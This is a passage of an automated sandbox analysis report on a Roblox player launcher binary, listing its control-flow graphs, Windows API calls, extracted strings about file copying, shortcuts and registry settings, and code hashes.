              • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 007399FE
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 66a154be21ec5cbd4084e66653507b557601aa0888f8434c40baf49bab2d463a
              • Instruction ID: d9e49175db277bd2a915a42eafb5c51ddbfc727703fac990db596e5afd4630cd
              • Opcode Fuzzy Hash: 66a154be21ec5cbd4084e66653507b557601aa0888f8434c40baf49bab2d463a
              • Instruction Fuzzy Hash: A351D7729001189BDB14EFA8DC45BDEF7B9FF44310F108669EA18E7742E778A944CBA1

              Control-flow Graph

              control_flow_graph 460 a055b9-a055c6 call a19ea5 463 a05606-a05609 ExitThread 460->463 464 a055c8-a055d0 460->464 464->463 465 a055d2-a055d6 464->465 466 a055d8 call a1abc4 465->466 467 a055dd-a055e3 465->467 466->467 469 a055f0-a055f6 467->469 470 a055e5-a055e7 467->470 469->463 472 a055f8-a055fa 469->472 470->469 471 a055e9-a055ea CloseHandle 470->471 471->469 472->463 473 a055fc-a05600 FreeLibraryAndExitThread 472->473 473->463
              APIs
                • Part of subcall function 00A19EA5: GetLastError.KERNEL32(00000000,?,00A0424F,00A1A2ED,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A19EA9
                • Part of subcall function 00A19EA5: SetLastError.KERNEL32(00000000), ref: 00A19F4B
              • CloseHandle.KERNEL32(?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A055EA
              • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00A056F0,?,?,00A05562,00000000), ref: 00A05600
              • ExitThread.KERNEL32 ref: 00A05609
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
              • String ID:
              • API String ID: 1991824761-0
              • Opcode ID: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
              • Instruction ID: 5409e56de043acacab75a453b86ffadee238170dee6c38dd643b79a99aaccb91
              • Opcode Fuzzy Hash: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
              • Instruction Fuzzy Hash: FEF08274804A496BDB319BB9DD0CA5B3B9A6F01360F5C4A10F829C60F1EB32ED52CF90

              Control-flow Graph

              APIs
              • GetCurrentProcess.KERNEL32(00000002,?,00A140B5,00A05409,00A05409,?,00000002,2912923C,00A05409,00000002), ref: 00A140CC
              • TerminateProcess.KERNEL32(00000000,?,00A140B5,00A05409,00A05409,?,00000002,2912923C,00A05409,00000002), ref: 00A140D3
              • ExitProcess.KERNEL32 ref: 00A140E5
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction ID: 3a98890832b10b93a759d7b33ccc4f7f60f1ae0e39bd3c1366169b26979eba62
              • Opcode Fuzzy Hash: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction Fuzzy Hash: 3DD05E3D004144BBCF11AFA5DD0D8DC3F2AEF893517104010F90546032CB7688D28A80

              Control-flow Graph

              control_flow_graph 481 a09474-a09493 482 a09499-a0949b 481->482 483 a0966d 481->483 484 a094c7-a094ed 482->484 485 a0949d-a094bc call 9fb712 482->485 486 a0966f-a09673 483->486 488 a094f3-a094f9 484->488 489 a094ef-a094f1 484->489 492 a094bf-a094c2 485->492 488->485 491 a094fb-a09505 488->491 489->488 489->491 493 a09515-a09520 call a08fc1 491->493 494 a09507-a09512 call a098bb 491->494 492->486 499 a09562-a09574 493->499 500 a09522-a09527 493->500 494->493 501 a095c5-a095e5 WriteFile 499->501 502 a09576-a0957c 499->502 503 a09529-a0952d 500->503 504 a0954c-a09560 call a08b87 500->504 507 a095f0 501->507 508 a095e7-a095ed GetLastError 501->508 510 a095b3-a095be call a0903f 502->510 511 a0957e-a09581 502->511 505 a09533-a09542 call a08f59 503->505 506 a09635-a09647 503->506 522 a09545-a09547 504->522 505->522 512 a09651-a09663 506->512 513 a09649-a0964f 506->513 517 a095f3-a095fe 507->517 508->507 521 a095c3 510->521 518 a095a1-a095b1 call a09203 511->518 519 a09583-a09586 511->519 512->492 513->483 513->512 523 a09600-a09605 517->523 524 a09668-a0966b 517->524 528 a0959c-a0959f 518->528 519->506 525 a0958c-a09597 call a0911a 519->525 521->528 522->517 529 a09633 523->529 530 a09607-a0960c 523->530 524->486 525->528 528->522 529->506 532 a09625-a0962e call a04213 530->532 533 a0960e-a09620 530->533 532->492 533->492
              APIs
                • Part of subcall function 00A08B87: GetConsoleOutputCP.KERNEL32(2912923C,00000000,00000000,00000000), ref: 00A08BEA
              • WriteFile.KERNEL32(?,00000000,?,00B47378,00000000,0000000C,00000000,00000000,00A28271,00000000,00B47378,00000010,009FCB49,00000000,00000000,00000000), ref: 00A095DD
              • GetLastError.KERNEL32 ref: 00A095E7
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConsoleErrorFileLastOutputWrite
              • String ID:
              • API String ID: 2915228174-0
              • Opcode ID: 852ef951b28a0e9f4df014152bf0c9f26d16e132a5bcba24b3632a4dbfee0b16
              • Instruction ID: 315851a188fb439a988d83a8ca869717e775b24c83754f05621aa51a8b16c36e
              • Opcode Fuzzy Hash: 852ef951b28a0e9f4df014152bf0c9f26d16e132a5bcba24b3632a4dbfee0b16
              • Instruction Fuzzy Hash: 9C618D71D0414DAEDF119FA8EC84AEFBBB9AF09308F144185E914A7293D776DA06CB60

              Control-flow Graph

              control_flow_graph 536 8bc620-8bc646 537 8bc64c-8bc65a 536->537 538 8bc7e2-8bc7ea 536->538 539 8bc74a-8bc74d 537->539 540 8bc660-8bc667 537->540 541 8bc750-8bc7d9 GetCurrentThreadId call 72ed70 call a03e90 539->541 542 8bc67b-8bc70f call 9f7a50 GetCurrentThreadId call 8bd060 call 8bfb60 call 72ed70 call a03e90 540->542 543 8bc669-8bc670 540->543 541->538 561 8bc721-8bc728 542->561 562 8bc711-8bc719 542->562 543->542 544 8bc672-8bc676 543->544 544->541 561->538 563 8bc72e-8bc749 561->563 564 8bc71e 562->564 564->561
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 008BC6A0
              • GetCurrentThreadId.KERNEL32 ref: 008BC760
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CurrentThread
              • String ID:
              • API String ID: 2882836952-0
              • Opcode ID: 990d0d4e793a06191e068efef799819d2ed8acaa28945d51aadf1ea4f32aca8b
              • Instruction ID: 6e066eb32941de50e7204848c2b01267c961dd46c89f4bbe4834937b84b9724b
              • Opcode Fuzzy Hash: 990d0d4e793a06191e068efef799819d2ed8acaa28945d51aadf1ea4f32aca8b
              • Instruction Fuzzy Hash: D7512F71D002089FDB14DF98DC45BFEBB78FF41300F044269E955A7282DB719A65CBA5

              Control-flow Graph

              control_flow_graph 566 8bc490-8bc49e 567 8bc4a0-8bc4a2 566->567 568 8bc507-8bc50a 566->568 569 8bc4ba-8bc504 GetCurrentThreadId call 8bd000 567->569 570 8bc4a4-8bc4ab 567->570 569->568 571 8bc50b-8bc578 call 9f7a50 GetCurrentThreadId call 8bd110 570->571 572 8bc4ad-8bc4b4 570->572 582 8bc57a-8bc584 571->582 583 8bc58c-8bc593 571->583 572->571 573 8bc4b6 572->573 573->569 585 8bc589 582->585 583->568 584 8bc599-8bc5b1 583->584 585->583
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 008BC4C9
              • GetCurrentThreadId.KERNEL32 ref: 008BC535
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CurrentThread
              • String ID:
              • API String ID: 2882836952-0
              • Opcode ID: 9132f180657be7adc1a0685819922208d4ab2e96d44190ef006a539abe77fd34
              • Instruction ID: 0d51ec40682031c5a812f53fd3f844760971207370d3d07ca988f1303d3ff99b
              • Opcode Fuzzy Hash: 9132f180657be7adc1a0685819922208d4ab2e96d44190ef006a539abe77fd34
              • Instruction Fuzzy Hash: BB315775800209EBCF10EF94EC45AEE7BB5FF08304F044259FE58A6250DB369AA1DB95

              Control-flow Graph

              control_flow_graph 587 a0903f-a09094 call 9e0920 590 a09096 587->590 591 a09109-a09119 call 9e15fd 587->591 593 a0909c 590->593 594 a090a2-a090a4 593->594 596 a090a6-a090ab 594->596 597 a090be-a090e3 WriteFile 594->597 598 a090b4-a090bc 596->598 599 a090ad-a090b3 596->599 600 a09101-a09107 GetLastError 597->600 601 a090e5-a090f0 597->601 598->594 598->597 599->598 600->591 601->591 602 a090f2-a090fd 601->602 602->593 603 a090ff 602->603 603->591
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,?,00A095C3,00000000,00000000,00000000,?,0000000C,00000000), ref: 00A090DB
              • GetLastError.KERNEL32(?,00A095C3,00000000,00000000,00000000,?,0000000C,00000000,00000000,00A28271,00000000,00B47378,00000010,009FCB49,00000000,00000000), ref: 00A09101
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID:
              • API String ID: 442123175-0
              • Opcode ID: 5ca0e78219dbf8af4536d3adc08f8d31cdb846dec39ae9accb756b1ab49c8259
              • Instruction ID: d52a7d19358c9bafd939415af1227ce337feba9e2007a605cb9c65ff31049164
              • Opcode Fuzzy Hash: 5ca0e78219dbf8af4536d3adc08f8d31cdb846dec39ae9accb756b1ab49c8259
              • Instruction Fuzzy Hash: 5B217435A002199FCF15CF6AEC809DEB7B9EB8D301F1441AAE946D7252D731DD46CB60

              Control-flow Graph

              APIs
              • GetLastError.KERNEL32(00B47218,0000000C), ref: 00A05517
              • ExitThread.KERNEL32 ref: 00A0551E
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread
              • String ID:
              • API String ID: 1611280651-0
              • Opcode ID: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction ID: 85ceacdb8c59b5428d7dbc31fef467feeb4cae1b9a0712499fe23f1e425572a8
              • Opcode Fuzzy Hash: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction Fuzzy Hash: 02F0C274A84604AFDF05EBB0D94AAAF3B75FF85710F100549F0059B2A2CB756D41CF91
              APIs
              • RtlFreeHeap.NTDLL(00000000,00000000,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199F2
              • GetLastError.KERNEL32(?,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199FD
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFreeHeapLast
              • String ID:
              • API String ID: 485612231-0
              • Opcode ID: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction ID: fb8b4a324697dc0f9d3f5675f5621251165e471ab24f7bd65eeea48243c7b30c
              • Opcode Fuzzy Hash: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction Fuzzy Hash: F6E08C76100258ABDB116FE8BC08BCA3B98EF88795F144120F608960A1CB318892CBD4
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
              • Instruction ID: ba1b07104893c29c7f65643d25fedcbf0dfff4304bf3c8891f3570b772c6b26a
              • Opcode Fuzzy Hash: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
              • Instruction Fuzzy Hash: 1601D8377122155FDF168F79EC40ADA33A6EBD53607298121FD25CB158EA31D881C791
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A1A2DC
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction ID: a27d0a744a43b8d9e65112d378cef025f6b9009a4d35a49d4bfd38ebf3ef9298
              • Opcode Fuzzy Hash: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction Fuzzy Hash: 19F0E9326462246BDB215B669D01BDB375CEFA5770F148122BC04970A1CB72DCC186E6
              APIs
              • RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction ID: 0c27dd24c3157f9acd721d8779196da8dcd474ae44e4d8d64afae9e4d7ba7471
              • Opcode Fuzzy Hash: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction Fuzzy Hash: A8E0E53D6062215BD6302BAA9D00BDB365CEF613F0F144121BC219B0C1CB20CC8141E7
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: H_prolog3
              • String ID:
              • API String ID: 431132790-0
              • Opcode ID: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction ID: 925cb56afe998688b363f45819e551665b41c3fba622edb0eedd23095eef86ec
              • Opcode Fuzzy Hash: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction Fuzzy Hash: 54E01A72C1020E9BCF00DFE8C542BEFB7B8AF08300F508026A211E7140EB3893858BA1
              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 0073B03E
                • Part of subcall function 0073D2E0: GetLastError.KERNEL32 ref: 0073D2FB
              • CoCreateInstance.OLE32(00B15228,00000000,00000001,00A96CCC,?,CLSID_ShellLink failed), ref: 0073B280
              • DeleteFileW.KERNEL32(?), ref: 0073B2C9
                • Part of subcall function 0071B180: ___std_exception_copy.LIBVCRUNTIME ref: 0071B1AB
                • Part of subcall function 009F7461: RaiseException.KERNEL32(E06D7363,00000001,00000003,009E35B6,009E35B6,?,009E20DC,009E35B6,00B45B84,00000000,009E35B6,00000000,015B8558,009E3588,00000006), ref: 009F74C1
                • Part of subcall function 0071E0F0: GetLastError.KERNEL32(0073CD66,00B314CC,0073CD66,?,0073CD66,80004005), ref: 0071E110
              Strings
              • Error closing dstFile='%s' during copy: %s, xrefs: 0073AF5C
              • CLSID_ShellLink failed, xrefs: 0073B265
              • psl->SetPath failed, xrefs: 0073B294
              • Error with seekg to beginning on srcFile='%s' during copy: %s, xrefs: 0073AC4E
              • Ver, xrefs: 0073A6B6
              • psl->SetArguments failed, xrefs: 0073B2B3
              • ios_base::badbit set, xrefs: 0073AE30, 0073AE59, 0073AF1B
              • IPersistFile Save failed, xrefs: 0073B2FE
              • Failed to create Shortcuts folder, xrefs: 0073B398
              • ios_base::failbit set, xrefs: 0073AE3A
              • Error opening srcFile='%s' for copy: %s, xrefs: 0073B010
              • ios_base::eofbit set, xrefs: 0073AE3F
              • Error closing srcFile='%s' during copy: %s, xrefs: 0073AEA3
              • Error reading srcFile='%s' during copy: %s, xrefs: 0073AD43
              • Error opening dstFile='%s' for copy: %s, xrefs: 0073AA89
              • Error writing dstFile='%s' during copy: %s, xrefs: 0073ADBC
              • Error with tellg on srcFile='%s' during copy: %s, xrefs: 0073ABD5
              • cur, xrefs: 0073A6E0
              • Error with seekg to end on srcFile='%s' during copy: %s, xrefs: 0073AAE0
              • IID_IPersistFile failed, xrefs: 0073B2DC
              • %s%s.lnk, xrefs: 0073B171
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast$Concurrency::cancel_current_taskCreateDeleteExceptionFileInstanceRaise___std_exception_copy
              • String ID: %s%s.lnk$CLSID_ShellLink failed$Error closing dstFile='%s' during copy: %s$Error closing srcFile='%s' during copy: %s$Error opening dstFile='%s' for copy: %s$Error opening srcFile='%s' for copy: %s$Error reading srcFile='%s' during copy: %s$Error with seekg to beginning on srcFile='%s' during copy: %s$Error with seekg to end on srcFile='%s' during copy: %s$Error with tellg on srcFile='%s' during copy: %s$Error writing dstFile='%s' during copy: %s$Failed to create Shortcuts folder$IID_IPersistFile failed$IPersistFile Save failed$Ver$cur$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$psl->SetArguments failed$psl->SetPath failed
              • API String ID: 3040415690-3294270231
              • Opcode ID: 090ab44c622468010153a8f9557983a42ea75a41f1d85ddde76f4af946ea1e96
              • Instruction ID: fc6f6bb1e73a3e714966065f39dfcde07aff198e1d923203417c54cbfd987968
              • Opcode Fuzzy Hash: 090ab44c622468010153a8f9557983a42ea75a41f1d85ddde76f4af946ea1e96
              • Instruction Fuzzy Hash: 53821471D00248EBEF14DFA8DD4ABEEBBB5FF44304F144158E409A7292E779AA44CB91
              APIs
              • FormatMessageW.KERNEL32(000012FF,00000000,?,00000000,?,00000100,00000000), ref: 00A28206
              • GetLastError.KERNEL32(?), ref: 00A2829F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID: $%s (%u)$Error %u while retrieving error %u
              • API String ID: 3479602957-4153721329
              • Opcode ID: 632fe6495deafd15b908abfdaf69953e10893ced9f768c69daff15e5d4e1a13b
              • Instruction ID: 158fa50e2702cd15c3c3363866517fd3073ddcc2e16b8339a00c7f3b9f564252
              • Opcode Fuzzy Hash: 632fe6495deafd15b908abfdaf69953e10893ced9f768c69daff15e5d4e1a13b
              • Instruction Fuzzy Hash: 20312C71A022289BDB14EB2CED4ABEE7368EF45700F1045B5F916D7282DF35AE81CB51
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00834AD8
              • Process32First.KERNEL32(00000000,?), ref: 00834B1F
              • Process32Next.KERNEL32(00000000,?), ref: 00834C08
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Process32$CreateFirstNextSnapshotToolhelp32
              • String ID:
              • API String ID: 1238713047-0
              • Opcode ID: 805d4696f3c1f5c36358d7b35552d6d4cb5c400d482eaccdca44260d89ebb838
              • Instruction ID: 151abd51bf9ded08f95fa0a0a8b9330f6b88ff376cbe38cfb0173a601c6cad94
              • Opcode Fuzzy Hash: 805d4696f3c1f5c36358d7b35552d6d4cb5c400d482eaccdca44260d89ebb838
              • Instruction Fuzzy Hash: 7251AC71A01219DBCB10CF99D9847AEF7B5FBC5320F149199E818AB390D374AE41CBE0
              APIs
              • LoadResource.KERNEL32(8007000E,?,?,?,8007000E,00736F72), ref: 0073733A
              • LockResource.KERNEL32(00000000,?,8007000E,00736F72), ref: 00737345
              • SizeofResource.KERNEL32(8007000E,?,?,8007000E,00736F72), ref: 00737357
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Resource$LoadLockSizeof
              • String ID:
              • API String ID: 2853612939-0
              • Opcode ID: c2e541cdfd06f5ffb3be3f99f661a4707b97dbece3a6692202dc1800023f2480
              • Instruction ID: ce1046f78571e4838387e361df01f5622ace09ef0300933fc8c44acfcacda4da
              • Opcode Fuzzy Hash: c2e541cdfd06f5ffb3be3f99f661a4707b97dbece3a6692202dc1800023f2480
              • Instruction Fuzzy Hash: DBF022368042A6E7DF391F98DC040AD7B64EB40351B004A26FD09C7021E3368D50E7C0
              APIs
              • LoadLibraryW.KERNEL32(?,?,?,008B1998,kernel32.dll,::GetNamedPipeClientProcessId,00000000,?,00000000,?,74DEE010), ref: 008A9D5B
              • GetProcAddress.KERNEL32(00000000,?), ref: 008A9D87
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: 032512532da8536f523e71ab15d8184480759ef60e60757b7650a298f39892f5
              • Instruction ID: 83d3ef5f5f33e410f8b589a7b90a6b1f8200573d31a450c983bdec1c5927e0ed
              • Opcode Fuzzy Hash: 032512532da8536f523e71ab15d8184480759ef60e60757b7650a298f39892f5
              • Instruction Fuzzy Hash: 77E0E529A083595BEB319E9498146E7BBEDEB8B399F10C859E9DCC3501E631EC848390
              APIs
              • GetModuleHandleW.KERNEL32(00000000,00000000,?), ref: 00776DC8
              • GetModuleHandleW.KERNEL32(?), ref: 00776DCF
              • FormatMessageW.KERNEL32(000013FF,00000000,?,?,?), ref: 00776E12
              • FormatMessageW.KERNEL32(000013FF,?,?,?,?,00000000,00000000), ref: 00776E3A
              • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00776E67
              • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00776E79
              • LocalFree.KERNEL32(?,?,?), ref: 0077713C
              • LocalFree.KERNEL32(?,?,?), ref: 007771D2
              Strings
              • An error occurred in the secure channel support., xrefs: 00776E71
              • , xrefs: 007770AD
              • The operation timed out., xrefs: 00776E83
              • Unknown error code 0x{:08x}., xrefs: 00776F06
              • A connection with the server could not be established., xrefs: 00776E5F
              • The server name or address could not be resolved., xrefs: 00776E95
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FormatFreeHandleLocalMessageModuleSimpleString::operator=
              • String ID: $A connection with the server could not be established.$An error occurred in the secure channel support.$The operation timed out.$The server name or address could not be resolved.$Unknown error code 0x{:08x}.
              • API String ID: 3119777634-2311890575
              • Opcode ID: db72ff3b1c6632b8ed0f318e4d489d645653024a4f7fcbb20267ff66d7896621
              • Instruction ID: f0c42359a24bfc07733b453f87c65bed00e2b5a4666e6b148210af1cfd582030
              • Opcode Fuzzy Hash: db72ff3b1c6632b8ed0f318e4d489d645653024a4f7fcbb20267ff66d7896621
              • Instruction Fuzzy Hash: E9D10571D00209DBDF14CF68CC44BEEBBB5FF88354F148659E518A7291E778AA84CBA1
              APIs
                • Part of subcall function 00767F90: RegCloseKey.ADVAPI32(00000000), ref: 00768039
              • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?), ref: 0076838E
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 007683A3
              • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,00000000,?,?), ref: 007683E9
              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 007683FD
              • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?), ref: 007684AB
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 007684C0
              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000000,?,?), ref: 00768506
              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0076851A
              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00768606
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Close$AddressHandleModuleOpenProc
              • String ID: Advapi32.dll$ClientChannelProbabilityString$RegOpenKeyTransactedW$version
              • API String ID: 1177782415-1752450418
              • Opcode ID: eab4f0abd4fab6f7e464082ab5c1102a7ba07800d8286e0cfb0fd86a0f3b9311
              • Instruction ID: cdfe39913f70d23f552a54380c822ef0fa91e3311892aa1fe1b3573a52e7f312
              • Opcode Fuzzy Hash: eab4f0abd4fab6f7e464082ab5c1102a7ba07800d8286e0cfb0fd86a0f3b9311
              • Instruction Fuzzy Hash: 38B1D574A00249AFDF64CF98DC18BAE7BB5EB44704F108219ED07A7292DF799944CB62
              APIs
              • __floor_pentium4.LIBCMT ref: 0075E56F
              • Concurrency::cancel_current_task.LIBCPMT ref: 0075E5B4
              • RegDeleteValueW.ADVAPI32(?,name), ref: 0075E75E
              • RegQueryValueExW.ADVAPI32(?,expiration,00000000,?,?,?), ref: 0075E797
              • RegDeleteValueW.ADVAPI32(?,expiration), ref: 0075E7D5
              • RegCloseKey.ADVAPI32(?), ref: 0075E83F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Value$Delete$CloseConcurrency::cancel_current_taskQuery__floor_pentium4
              • String ID: *.*$Channel$Failed to delete channel expiration in %s$Failed to delete channel name in %s$expiration$name
              • API String ID: 1833052805-1638369838
              • Opcode ID: f7f3f4fc9acde4dc09f493c1c6e7ceb285a30f25fab1bc3bf0d89bbcc69cf973
              • Instruction ID: 75472d690d575457d5e990af684b2d2f6710d0def72a853468113ca53dcf1495
              • Opcode Fuzzy Hash: f7f3f4fc9acde4dc09f493c1c6e7ceb285a30f25fab1bc3bf0d89bbcc69cf973
              • Instruction Fuzzy Hash: 69C12771D002489BDB18DFA8DC45BDDBBB8FF48315F144628F815E7282E778AA58CB91
              APIs
              • GetThreadLocale.KERNEL32 ref: 008A8DA0
              • GetUserDefaultLCID.KERNEL32 ref: 008A8DB3
